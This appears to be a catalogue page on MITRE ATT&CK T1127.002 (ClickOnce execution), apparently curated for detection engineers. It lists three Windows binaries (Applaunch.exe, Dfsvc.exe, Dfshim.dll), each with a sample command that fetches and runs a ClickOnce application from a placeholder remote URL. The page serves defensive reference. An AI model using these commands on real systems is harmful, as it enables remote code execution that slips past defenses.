T1127.002Tactic: Execution & Defense EvasionOfficial MITRE ATT&CK Page

T1127.002: Technique T1127.002

Adversaries may leverage living-off-the-land techniques (T1127.002) to achieve execution, evade defenses, or transfer tools.

Total Capable Binaries: 3
Windows: 3
Linux: 0
macOS: 0

Living-off-the-Land Matrix for T1127.002

Across 3 verified binaries
Windows1 payloads

Applaunch.exe

Microsoft .NET ClickOnce Launch Utility.

Sample Attack Vector:
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Applaunch.exe" /activate "{REMOTEURL}#APPLICATION_METADATA_HERE"
Windows1 payloads

Dfsvc.exe

ClickOnce engine in Windows used by .NET

Sample Attack Vector:
rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}
Windows1 payloads

Dfshim.dll

ClickOnce engine in Windows used by .NET

Sample Attack Vector:
rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}
Sharon Ben Moshe
Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection EngineerCheck Point